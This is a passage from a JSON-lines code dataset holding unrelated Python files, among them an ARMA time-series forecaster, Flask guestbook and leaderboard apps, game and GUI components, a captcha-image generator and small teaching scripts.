TestServerHelpers(unittest.TestCase):\n\n def __init__(self, *args, **kwargs):\n unittest.TestCase.__init__(self, *args, **kwargs)\n\n def test_is_posn(self):\n good_posn = [0, 1]\n bad_posn_wrong_len = [1, 2, 3]\n bad_posn_wrong_type = ['a', 'b'] \n\n self.assertTrue(is_posn(good_posn))\n self.assertFalse(is_posn(bad_posn_wrong_len))\n self.assertFalse(is_posn(bad_posn_wrong_type))\n\n def test_is_move(self):\n good_move = [[1, 2], [2, 1]]\n bad_move_wrong_len = [[1, 2]]\n bad_move_wrong_type = [[1, 2], [1]]\n\n self.assertTrue(is_move(good_move))\n self.assertFalse(is_move(bad_move_wrong_len))\n self.assertFalse(is_move(bad_move_wrong_type))\n\n\nclass TestFishClient(unittest.TestCase):\n \n def __init__(self, *args, **kwargs):\n unittest.TestCase.__init__(self, *args, **kwargs)\n self.mock_client = None\n\n def setUp(self):\n mock_socket = mock.Mock()\n self.mock_client = FishClient(mock_socket, (\"localhost\", 12345))\n\n def test_get_player_name(self):\n self.mock_client.client_socket.recv.return_value=\"mike\"\n self.assertEqual(\"mike\", self.mock_client.get_player_name())\n\n self.mock_client.client_socket.recv.return_value=\"#7&!\"\n self.assertTrue(self.mock_client.get_player_name() is None)\n\n def test_end_connection(self):\n self.mock_client.end_connection()\n self.mock_client.client_socket.close.assert_called()\n self.assertTrue(self.mock_client.closed)\n\n\n\nclass TestFishServer(unittest.TestCase):\n pass\n","sub_path":"Fish/Common/Tests/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"114360411","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfilePath = 'a_speedway_log.csv'\ntrackName = 'a_speedway'\n\ntestData = np.genfromtxt(filePath, delimiter=',', skip_header=1,\n skip_footer=0, names=[\"time\",\"speedX\",\"speedY\",\"speedZ\",\"angle\",\"damage\",\"rpm\",\"trackPos\",\"steering\",\"accel\",\"brake\",\"reward\",\"loss\"])\n\nfig, ax1 = plt.subplots()\nfig.suptitle(trackName)\niterations = np.arange(0, testData.shape[0], 1) \nspeedXsin = -abs(np.multiply(testData[\"speedX\"], np.sin(testData[\"angle\"])))\nspeedXcos = abs(np.multiply(testData[\"speedX\"], np.cos(testData[\"angle\"])))\nspeedXtrackPos = abs(np.multiply(testData[\"speedX\"], testData[\"trackPos\"]))\n\n# Label graph axes \nax1.set_xlabel('Iteration #')\nax1.set_ylabel('Reward Value')\n\n# Plot multiple curves (one per training model) \ntransversal = ax1.plot(iterations, speedXsin, 'b-', label = 'speedX * sin(angle) (Transversal vel.)')\nparallel = ax1.plot(iterations, speedXcos, 'r-', label = '-speedX * cos(angle) (-Parallel vel.)')\nposition = ax1.plot(iterations, speedXtrackPos, 'g-', label = 'speedX * trackPos (Weighted Track Position)')\ntotal = ax1.plot(iterations, testData['reward'], 'b-', label = \"Total Reward\")\n\nplt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\n ncol=2, mode=\"expand\", borderaxespad=0.)\nplt.show() \n","sub_path":"torcs-deep-rl/experiments/FCNetA/a_speedway/a_speedwayrewards.py","file_name":"a_speedwayrewards.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"431612681","text":"# =====================================================\n# Title : ARMA Model\n# Author : Sasanka Withanage\n# Last modified Date : 03 May 2020\n# =====================================================\n\nimport sys\nimport numpy\nfrom typing 
import List, Any\nfrom Models.Components import DataRetriever\nfrom statsmodels.tsa.arima_model import ARMA\nfrom sklearn.metrics import mean_squared_error\nfrom Models.Components import AccuracyCalculator\nfrom Models.Components import CustomLogger as logger\n\nperiodOfTime, model = \"\", \"\"\n\n\n# -------------------------------------------------------------------------\n# This method can provide accuracy percentages and forecast values.\n# -------------------------------------------------------------------------\ndef predict(predictionName, datasetType, modelType=1, defaultRatio=True, sizeOfTrainingDataSet=7, getAccuracy=True,\n logOnTelegram=True, ratio=0.2):\n global periodOfTime, model\n try:\n # Printing request of user.\n if getAccuracy:\n logger.log(logOnTelegram, \"Client requested for \" + predictionName + \" accuracy\")\n else:\n logger.log(logOnTelegram, \"Client requested for \" + predictionName + \" forecast\")\n\n # Import relevant file from the server.\n series = DataRetriever.getFileData(datasetType)\n logger.log(logOnTelegram, \"Dataset retrieved successfully\")\n\n # Set splitting point of the dataset.\n logger.log(logOnTelegram, \"Finding splitting point\")\n if defaultRatio:\n split_point = int(len(series) - (len(series) * ratio))\n elif not getAccuracy:\n split_point = int(len(series))\n else:\n split_point = len(series) - sizeOfTrainingDataSet\n\n # Splitting data set according to the splitting point.\n trainingDataSet, validationDataSet = series[0:split_point], series[split_point:]\n logger.log(logOnTelegram, \"Data splitting successful\")\n\n # Set length into variables.\n trainingDataSetSize = len(trainingDataSet)\n testingDataSetSize = len(validationDataSet)\n\n trainingDataSetSizeString = 'Training Data Set Size : ' + str(trainingDataSetSize)\n testingDataSetSizeString = 'Testing Data Set Size : ' + str(testingDataSetSize)\n\n logger.log(logOnTelegram, trainingDataSetSizeString)\n logger.log(logOnTelegram, testingDataSetSizeString)\n\n # If user required for forecast, testing data size will set to future requirement.\n if not getAccuracy:\n testingDataSetSize = sizeOfTrainingDataSet\n logger.log(logOnTelegram,\n \"Testing data set is updated with new value. 
New value is \" + str(testingDataSetSize))\n\n # There is a difference in weather changing.\n # To find out that properly we are going to take seasonal difference.\n # That is, we can take the observation for a day and subtract the observation from the same day one year ago.\n # Remove seasonal difference.\n def findSeasonalDifference(dataset, interval=1):\n logger.log(logOnTelegram, \"Requested for seasonal difference\")\n\n # Initialize list as difference.\n listOfDifference = list()\n\n # Iterate through whole array.\n for datasetIndex in range(interval, len(dataset)):\n value = dataset[datasetIndex] - dataset[datasetIndex - interval]\n listOfDifference.append(value)\n\n # return difference array.\n return numpy.array(listOfDifference)\n\n # Invert difference values.\n # Only for data which changed and wanted to make it back as previous.\n def invertSeasonalDifference(lastIndexValue, differenceValue, interval=1):\n return differenceValue + lastIndexValue[-interval]\n\n # Retrieve values from training dataset.\n trainingDatasetValues = trainingDataSet.values\n\n # Train proper model according to user requirement.\n if modelType == 1:\n periodOfTime = 365\n seasonalDifferenceArray = findSeasonalDifference(trainingDatasetValues, periodOfTime)\n\n # Suitable seasonal order for the rainfall and temperature.\n model = ARMA(seasonalDifferenceArray, order=(7, 0))\n\n logger.log(logOnTelegram, \"ARMA model set. Order of arma model is 7,0 and period is 365\")\n\n elif modelType == 2:\n periodOfTime = 48\n seasonalDifferenceArray = findSeasonalDifference(trainingDatasetValues, periodOfTime)\n\n # Suitable seasonal order for the plant price prediction.\n model = ARMA(seasonalDifferenceArray, order=(2, 0))\n\n logger.log(logOnTelegram,\n \"ARIMA model set. Order of arima model is 2,0 and period is 48. 
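# Round trip of the two difference helpers above on a toy list (interval=2 is
# arbitrary): differencing and then inverting recovers the original value.
import numpy as np

def find_seasonal_difference(dataset, interval=1):
    # same logic as findSeasonalDifference above
    return np.array([dataset[i] - dataset[i - interval]
                     for i in range(interval, len(dataset))])

def invert_seasonal_difference(history, diff_value, interval=1):
    # same logic as invertSeasonalDifference above
    return diff_value + history[-interval]

series = [10, 12, 11, 14, 13, 16]
diffed = find_seasonal_difference(series, interval=2)             # [1, 2, 2, 2]
restored = invert_seasonal_difference(series[:4], diffed[2], interval=2)
assert restored == series[4]                                      # 11 + 2 == 13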
Weekly data sets\")\n\n # Training model.\n logger.log(logOnTelegram, \"Training model\")\n fittedModel = model.fit(disp=0)\n logger.log(logOnTelegram, \"Model fitted\")\n\n # Log summery details.\n logger.log(logOnTelegram, fittedModel.summary())\n\n # Future forecast value.\n forecast = fittedModel.forecast(steps=testingDataSetSize)[0]\n logger.log(logOnTelegram, \"Future values forecasted\")\n\n # Reshape history array.\n history = [x for x in trainingDatasetValues]\n\n forecastResult: List[Any] = []\n for singleForecastedElement in forecast:\n # Invert each value from forecasted values.\n inverted = invertSeasonalDifference(history, singleForecastedElement, periodOfTime)\n\n # Append to forecasted result.\n forecastResult.append(inverted)\n\n # Append values to history.\n history.append(inverted)\n\n logger.log(logOnTelegram, \"Multi step forecasted\")\n\n # Get values from the validation data.\n validationData = validationDataSet.values\n\n # Check for the user requirement whether accuracy or forecast details.\n if getAccuracy:\n\n # If rain fall return mean squared error.\n if datasetType == \"precipitation\":\n # Calculate mean squared error value.\n meanSquaredError = mean_squared_error(validationData, forecastResult, squared=False)\n\n # Log and return accuracy.\n logger.log(logOnTelegram, \"Mean squared error is \" + str(meanSquaredError))\n return str(meanSquaredError)\n else:\n # Calculate accuracy with predicted and testing data.\n accuracy = AccuracyCalculator.calculate(validationData, forecastResult)\n\n # Log and return accuracy.\n logger.log(logOnTelegram, \"Accuracy Percentage : \" + str(accuracy))\n return str(accuracy)\n else:\n # Return json array after calculation.\n jsonArray = AccuracyCalculator.jsonConverter(forecastResult)\n logger.log(logOnTelegram, \"JSON Array is : \" + str(jsonArray))\n return str(jsonArray)\n\n except Exception:\n # Display proper error message with error and error line.\n exc_type, exc_obj, exc_tb = sys.exc_info()\n exceptionDetails = str(exc_type) + \" error occurred in '\" + str(\n exc_tb.tb_frame.f_code.co_filename) + \"' Line : \" + str(exc_tb.tb_lineno)\n logger.log(logOnTelegram, exceptionDetails, \"ERROR\")\n return \"Error occurred in the source code\"\n\n# Model Training callers with out Api\n\n# --------------------------------------------------- Accuracy ---------------------------------------------------\n# predict(\"Temperature\", \"temp\")\n# predict(\"Precipitation\", \"precipitation\")\n# predict(\"AshPlantain-ARMA\", \"AshPlantain\", 2)\n# predict(\"Brinjal-ARMA\", \"Brinjal\", 2)\n# predict(\"Cucumber-ARMA\", \"Cucumber\", 2)\n# predict(\"LadiesFinger-ARMA\", \"LadiesFinger\", 2)\n# predict(\"RedPumpkin-ARMA\", \"RedPumpkin\", 2)\n\n# ------------------------------------------------- Forecasting -------------------------------------------------\n# predict(\"Temperature\", \"temp\", defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=90)\n# predict(\"Precipitation\", \"precipitation\", defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=90)\n# predict(\"ARMA_AshPlantain\", \"AshPlantain\", 2, defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=16)\n# predict(\"ARMA_Brinjal\", \"Brinjal\", 2, defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=16)\n# predict(\"ARMA_Cucumber\", \"Cucumber\", 2, defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=16)\n# predict(\"ARMA_LadiesFinger\", \"LadiesFinger\", 2, defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=16)\n# 
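# mean_squared_error(..., squared=False) as used above returns the *root* MSE
# (available in scikit-learn >= 0.22; newer releases expose
# root_mean_squared_error instead). A tiny sanity check against the formula:
import numpy as np
from sklearn.metrics import mean_squared_error

y_true, y_pred = np.array([3.0, 5.0, 2.5]), np.array([2.5, 5.0, 4.0])
rmse = mean_squared_error(y_true, y_pred, squared=False)
assert np.isclose(rmse, np.sqrt(np.mean((y_true - y_pred) ** 2)))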
predict(\"ARMA_RedPumpkin\", \"RedPumpkin\", 2, defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=16)\n","sub_path":"Data-Science/Prediction/Models/ARMA/ARMA.py","file_name":"ARMA.py","file_ext":"py","file_size_in_byte":8785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"470291117","text":"from flask import Flask, render_template, request, redirect, url_for\nimport mysql.connector\n# from flask_sqlalchemy import SQLAlchemy\n# import pymysql\n# pymysql.install_as_MySQLdb()\napp=Flask(__name__)\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:111@127.0.0.1:3306/flask_raw_sql'\n# app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n# db = SQLAlchemy(app)\n# class Comments(db.Model):\n# \tid = db.Column(db.Integer, primary_key=True)\n# \tname = db.Column(db.String(20))\n# \tcomment = db.Column(db.String(1000))\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"111\",\n database=\"flask_raw_sql\"\n )\nmymsg='welcome'\n@app.route('/')\ndef index():\n #result = Comments.query.all()\n #result = db.engine.execute(' SELECT * FROM comments')\n mycursor = mydb.cursor()\n mycursor.execute(\"SELECT * FROM comments\")\n myresult = mycursor.fetchall()\n return render_template('index.html',result=myresult,msg=mymsg)\n@app.route('/sign')\ndef sign():\n return render_template('sign.html')\n@app.route('/process',methods=['POST'])\ndef process():\n #signature=Comments(name=name,comment=comment)\n #signature=db.engine.execute(' INSERT INTO comments (name, comment) VALUES (%s,%s);',(name,comment)) #.execution_options(autocommit=True))\n #db.session.add(signature)\n #db.session.commit()\n name=request.form['name']\n comment=request.form['comment']\n sql = \"INSERT INTO comments (name, comment) VALUES (%s, %s)\"\n val = (name,comment)\n mycursor = mydb.cursor()\n mycursor.execute(sql,val)\n mydb.commit()\n global mymsg\n mymsg='successful'\n return redirect(url_for('index'))\n@app.route('/delete/',methods=['POST'])\ndef delete(id):\n sql=\"delete from comments where id = %s\"\n data=(id,)\n mycursor=mydb.cursor()\n mycursor.execute(sql,data)\n mydb.commit()\n global mymsg\n mymsg='deleted'\n return redirect('/')\n@app.route('/update/',methods=['POST'])\ndef update(id):\n sql = \"SELECT * FROM comments WHERE id = %s\"\n adr = (id, )\n mycursor=mydb.cursor()\n mycursor.execute(sql,adr)\n myresult = mycursor.fetchall()\n return render_template('update.html',data=myresult)\n@app.route('/update_data',methods=['POST'])\ndef update_data():\n id=request.form['id_data']\n name=request.form['name']\n comment=request.form['comment']\n mycursor=mydb.cursor()\n sql=\"update comments set name = %s , comment = %s where id = %s\"\n data=(name,comment,id,)\n mycursor.execute(sql,data)\n mydb.commit()\n global mymsg\n mymsg='updated'\n return redirect('/')\nif __name__== '__main__':\n app.run(debug=True)","sub_path":"gaustbook.py","file_name":"gaustbook.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"174590302","text":"def insertionSort(arr):\n n = len(arr)\n for i in range(n):\n temp = arr[i]\n idx = i-1\n while idx>=0 and arr[idx]>temp:\n arr[idx+1] = arr[idx]\n idx-=1\n arr[idx+1] = temp\n\n\nn = int(input())\narr = list(map(int, input().split()))\ninsertionSort(arr)\nfor i in range(len(arr)):\n print(arr[i],end=\" 
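# The guestbook above passes its status through a module-level global (mymsg),
# which is shared by every request; Flask's flash() is the request-safe
# alternative. A sketch only -- it assumes the index route from the record and
# needs a secret_key for the session cookie:
from flask import Flask, flash, redirect, url_for

app = Flask(__name__)
app.secret_key = "change-me"

@app.route("/process_demo", methods=["POST"])
def process_demo():
    flash("successful")                # stored per-user in the session
    return redirect(url_for("index"))  # index would render get_flashed_messages()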
\")\n","sub_path":"insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"324439471","text":"\n\n#calss header\nclass _BUNKER():\n\tdef __init__(self,): \n\t\tself.name = \"BUNKER\"\n\t\tself.definitions = [u'a shelter, usually underground, that has strong walls to protect the people inside it from bullets or bombs', u'in golf, a hollow area of ground filled with sand, that is difficult to hit a ball out of']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_bunker.py","file_name":"_bunker.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"410062837","text":"import random\r\nimport os\r\nfrom PIL import ImageFont, Image, ImageDraw, ImageFilter\r\n\r\n\r\ndef auth_code():\r\n size = (185, 60) # 图片大小\r\n font_list = list(\"0123456789abcdefghijklmnopqrstuvwxyz\") # 验证码范围\r\n c_chars = \" \".join(random.sample(font_list, 4)) # 4个+中间加个俩空格\r\n print(c_chars)\r\n img = Image.new(\"RGB\", size, (33, 33, 34)) # RGB颜色\r\n draw = ImageDraw.Draw(img) # draw一个\r\n #font = ImageFont.truetype(\"arial.ttf\", 23) # 字体\r\n font = ImageFont.truetype(\"arial.ttf\", 30) # 字体\r\n draw.text((5, 4), \" \"+c_chars, font=font, fill=\"white\") # 字颜色\r\n params = [1 - float(random.randint(1, 2)) / 100,\r\n 0,\r\n 0,\r\n 0,\r\n 1 - float(random.randint(1, 10)) / 100,\r\n float(random.randint(1, 2)) / 500,\r\n 0.001,\r\n 0.002]\r\n img = img.transform(size, Image.PERSPECTIVE, params)\r\n img = img.filter(ImageFilter.EDGE_ENHANCE_MORE)\r\n img.save(f'./test_img/{c_chars}.png')\r\n\r\n\r\nif __name__ == '__main__':\r\n if not os.path.exists('./test_img'):\r\n os.mkdir('./test_img')\r\n while True:\r\n auth_code()\r\n if len(os.listdir('./test_img')) >= 3000:\r\n break\r\n","sub_path":"yanzhengma_bk/Demo/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"291976813","text":"import pygame\nimport math\n\nfrom models.items.item_types import ItemType\n\n\nclass HungerBar:\n txt_surface = None\n\n def __init__(self, player):\n self.hunger = 1000\n self.font = pygame.font.SysFont(\"Arial\", 30, True)\n self.font_small = pygame.font.SysFont(\"Arial\", 12, True)\n self.txt_surface = self.font.render(\"Hunger: \" + str(int(self.hunger)), True, (0, 255, 0))\n self.txt_2 = self.font_small.render(\"You're getting hungry, press 'E' to eat 1 wheat.\", True, (255, 255, 255))\n self.txt_3 = self.font_small.render(\"You're getting hungry, try to find something to eat\", True, (255, 255, 255))\n self.player = player\n self.heal_step = 0\n\n def step(self):\n self.heal_step += 1\n if self.heal_step == 100:\n self.heal_step = 0\n\n self.hunger -= 0.1\n if self.hunger > 500:\n self.txt_surface = self.font.render(\"Hunger: \" + str(int(self.hunger)), True, (0, 255, 0))\n if self.heal_step == 0:\n self.player.health_bar.take_damage(-1)\n elif self.hunger > 250:\n self.txt_surface = self.font.render(\"Hunger: \" + str(int(self.hunger)), True, (255, 255, 102))\n else:\n self.txt_surface = self.font.render(\"Hunger: \" + str(int(self.hunger)), True, (255, 0, 0))\n\n if self.hunger < 0:\n self.hunger = 
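# The captcha generator above encodes the ground truth in each file name
# ("a b c d.png" -> label "abcd"); a small helper to recover (path, label)
# pairs from the ./test_img layout it creates:
import os

def load_labeled_paths(img_dir="./test_img"):
    pairs = []
    for fname in os.listdir(img_dir):
        label = os.path.splitext(fname)[0].replace(" ", "")
        pairs.append((os.path.join(img_dir, fname), label))
    return pairs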
0\n self.player.health_bar.take_damage(1)\n\n def draw(self, surface):\n surface.blit(self.txt_surface, (10, 660))\n if self.hunger < 500:\n if self.player.inventory.inventory[ItemType.WHEAT].amount > 0:\n surface.blit(self.txt_2, (10, 700))\n else:\n surface.blit(self.txt_3, (10, 700))\n\n def eat(self):\n self.hunger += 100\n self.hunger = min(1000, self.hunger)\n","sub_path":"models/hungerbar.py","file_name":"hungerbar.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"597984915","text":"\n\nfrom xai.brain.wordbase.nouns._anthill import _ANTHILL\n\n#calss header\nclass _ANTHILLS(_ANTHILL, ):\n\tdef __init__(self,): \n\t\t_ANTHILL.__init__(self)\n\t\tself.name = \"ANTHILLS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"anthill\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_anthills.py","file_name":"_anthills.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"649652115","text":"'''\nimport sys\nimport time\n\nfor i in range(30):\n sys.stdout.write(\"#\")\n sys.stdout.flush()\n time.sleep(0.1)\n\nf = open(\"yestday\", 'r+', encoding=\"utf-8\") # r+在文件末尾追加\n# f = open(\"yestday\", 'w+', encoding=\"utf-8\") # w+ 写读,在文件末尾添加,如果不存在,则创建,覆盖写入\n# f = open(\"yestday\", 'a+', encoding=\"utf-8\") # a+ 追加写+读,在文件末尾追加\n\n# f = open(\"yestday\", 'wb')\n# print(f.readline())\n\n# f.write(\"wo ai beijing ti an an men\".encode())\n# print(f.tell()) # 按字符计数\n\n# f.close()\n\n# f = open(\"yestday\", 'rb')\n# print(f.readline())\nprint(f.truncate(20))\n\nprint(f.readline()) # 按行读取\nprint(f.readlines()) # 一次读取整个文件,如果文件过大,请不要使用\"readlines\"读取文件\n\nf.flush() # 刷新缓存\nprint(f.seek(0)) # 移动文件指针位置\n\nprint(f.readline(5)) # 打印一行中的前5个字符\n\nf.close()\n'''\n# 修改文件内容\nf = open('yestday', 'r', encoding=\"utf-8\")\nf_new = open('yesday.bak', 'w', encoding=\"utf-8\")\n\nfor line in f:\n if '我' in line:\n line = line.replace('我', 'alber')\n f_new.write(line)\nf.close()\nf_new.close()\n\n\n\n\n\n\n\n\n\n\n\n\n# f = open(\"yestday\", 'r', encoding='utf-8')\n# data = f.read()\n# 读取文件前5行\n'''\nprint(f.readline())\nprint(f.readline())\nprint(f.readline())\nprint(f.readline())\nprint(f.readline())\n\nfor i in range(5):\n print(f.readline())\nfor line in f.readlines():\n print(line.strip())\n'''\n\n# 第10行不打印\n'''\nf = open(\"yestday\", 'r', encoding='utf-8')\nfor index, line in enumerate(f.readlines()):\n if index == 9:\n print(\"---我是分割符------------------------------------\")\n continue\n print(line.strip())\n\nf.close()\n\n\n# 高比格\nf = open(\"yestday\", 'r', encoding='utf-8')\ncount = 0\nfor line in f:\n count += 1\n if count == 9:\n print(\"---我是分割符------------------------------------\")\n print(line.strip())\n\n'''\n\n\n\n\n","sub_path":"day2/file_op.py","file_name":"file_op.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"239645498","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. 
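# The edit-via-copy idiom at the top of the record above leaves the modified
# text in "yesday.bak"; os.replace can swap it over the original atomically
# once the copy is complete (sketch using the same file names):
import os

with open("yestday", "r", encoding="utf-8") as src, \
     open("yesday.bak", "w", encoding="utf-8") as dst:
    for line in src:
        dst.write(line.replace("我", "alber"))
os.replace("yesday.bak", "yestday")  # atomic rename over the original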
You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport wx\nimport armid\nfrom DimensionListCtrl import DimensionListCtrl\nfrom RoleEnvironmentProperties import RoleEnvironmentProperties\nfrom DimensionCostListCtrl import DimensionCostListCtrl\n\n\nclass RoleEnvironmentPanel(wx.Panel):\n def __init__(self,parent,dp):\n wx.Panel.__init__(self,parent,armid.ROLE_PANELENVIRONMENT_ID)\n self.dbProxy = dp\n self.theEnvironmentDictionary = {}\n self.theSelectedIdx = -1\n\n mainSizer = wx.BoxSizer(wx.HORIZONTAL)\n environmentBox = wx.StaticBox(self)\n environmentListSizer = wx.StaticBoxSizer(environmentBox,wx.HORIZONTAL)\n mainSizer.Add(environmentListSizer,0,wx.EXPAND)\n self.environmentList = DimensionListCtrl(self,armid.ROLE_LISTENVIRONMENTS_ID,wx.DefaultSize,'Environment','environment',self.dbProxy,listStyle=wx.LC_REPORT | wx.LC_SINGLE_SEL)\n environmentListSizer.Add(self.environmentList,1,wx.EXPAND)\n\n environmentDimSizer = wx.BoxSizer(wx.VERTICAL)\n mainSizer.Add(environmentDimSizer,1,wx.EXPAND)\n\n rSizer = wx.BoxSizer(wx.HORIZONTAL)\n environmentDimSizer.Add(rSizer,1,wx.EXPAND)\n self.responseList = DimensionCostListCtrl(self,armid.ROLE_LISTRESPONSES_ID,'Response')\n responseBox = wx.StaticBox(self)\n responseSizer = wx.StaticBoxSizer(responseBox,wx.HORIZONTAL)\n responseSizer.Add(self.responseList,1,wx.EXPAND)\n rSizer.Add(responseSizer,1,wx.EXPAND)\n\n cSizer = wx.BoxSizer(wx.HORIZONTAL)\n environmentDimSizer.Add(cSizer,1,wx.EXPAND)\n self.cmList = DimensionListCtrl(self,armid.ROLE_LISTCOUNTERMEASURES_ID,wx.DefaultSize,'Countermeasure','countermeasure',self.dbProxy,listStyle = wx.LC_REPORT | wx.LC_SINGLE_SEL)\n cmBox = wx.StaticBox(self)\n cmSizer = wx.StaticBoxSizer(cmBox,wx.HORIZONTAL)\n cmSizer.Add(self.cmList,1,wx.EXPAND)\n cSizer.Add(cmSizer,1,wx.EXPAND)\n\n self.SetSizer(mainSizer)\n self.environmentList.Unbind(wx.EVT_RIGHT_DOWN)\n self.responseList.Unbind(wx.EVT_RIGHT_DOWN)\n self.cmList.Unbind(wx.EVT_RIGHT_DOWN)\n \n def loadControls(self,role):\n self.environmentList.Unbind(wx.EVT_LIST_ITEM_SELECTED)\n self.environmentList.Unbind(wx.EVT_LIST_ITEM_DESELECTED)\n\n# We load the environment name control before anything else. Weird stuff happens if we don't do this. 
Don't ask me why!!!\n environmentNames = []\n for cp in role.environmentProperties():\n environmentNames.append(cp.name())\n self.environmentList.load(environmentNames)\n\n for cp in role.environmentProperties():\n environmentName = cp.name()\n self.theEnvironmentDictionary[environmentName] = cp\n\n if (len(environmentNames) > 0):\n environmentName = environmentNames[0]\n p = self.theEnvironmentDictionary[environmentName]\n self.responseList.load(p.responses()) \n self.cmList.load(p.countermeasures()) \n self.environmentList.Select(0)\n self.environmentList.Bind(wx.EVT_LIST_ITEM_SELECTED,self.OnEnvironmentSelected)\n self.environmentList.Bind(wx.EVT_LIST_ITEM_DESELECTED,self.OnEnvironmentDeselected)\n self.theSelectedIdx = 0\n\n def OnEnvironmentSelected(self,evt):\n self.theSelectedIdx = evt.GetIndex()\n environmentName = self.environmentList.GetItemText(self.theSelectedIdx)\n p = self.theEnvironmentDictionary[environmentName]\n self.responseList.load(p.responses()) \n self.cmList.load(p.countermeasures())\n \n def OnEnvironmentDeselected(self,evt):\n self.responseList.DeleteAllItems() \n self.cmList.DeleteAllItems() \n self.theSelectedIdx = -1\n","sub_path":"cairis/cairis/RoleEnvironmentPanel.py","file_name":"RoleEnvironmentPanel.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"7079486","text":"from flask import Flask, url_for\nfrom flask import render_template, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nfrom sqlalchemy import desc, asc\nfrom flask_restful import Api, Resource\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\napi = Api(app)\n\n# Database table creation\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), unique=True, nullable=False)\n age = db.Column(db.Integer, nullable=False)\n points = db.Column(db.Integer, default=0, nullable=False)\n address = db.Column(db.String(120), nullable=False)\n \n def __repr__(self):\n return '' % self.name\n\n\nclass UserSchema(ma.Schema):\n class Meta:\n fields = (\"name\", \"age\", \"points\", \"address\")\n model = User\n\nuser_schema = UserSchema()\nusers_schema = UserSchema(many=True)\n\n\n@app.route('/')\ndef index():\n rows = User.query.order_by(desc(User.points),asc(User.name))\n return render_template('index.html',\n title='Leaderboard',\n rows=rows)\n\n@app.route('/adduser', methods=['POST'])\ndef add_user():\n new_user = User(\n name=request.form['name'].lower(),\n age=request.form['age'],\n address=request.form['address']\n )\n db.session.add(new_user)\n db.session.commit()\n return redirect(url_for('index'))\n\n@app.route('/plus', methods=['POST'])\ndef plus():\n user = User.query.filter_by(id=request.form[\"plus\"]).first_or_404()\n user.points += 1\n db.session.commit()\n return redirect(url_for('index'))\n\n@app.route('/minus', methods=['POST'])\ndef minus():\n user = User.query.filter_by(id=request.form[\"minus\"]).first_or_404()\n if user.points > 0:\n user.points -= 1\n db.session.commit()\n return redirect(url_for('index'))\n\n@app.route('/delete', methods=['POST'])\ndef delete():\n user = User.query.filter_by(id=request.form[\"delete\"]).first_or_404()\n db.session.delete(user)\n db.session.commit()\n return redirect(url_for('index'))\n\n@app.route('/add', methods=['POST'])\ndef add():\n return 
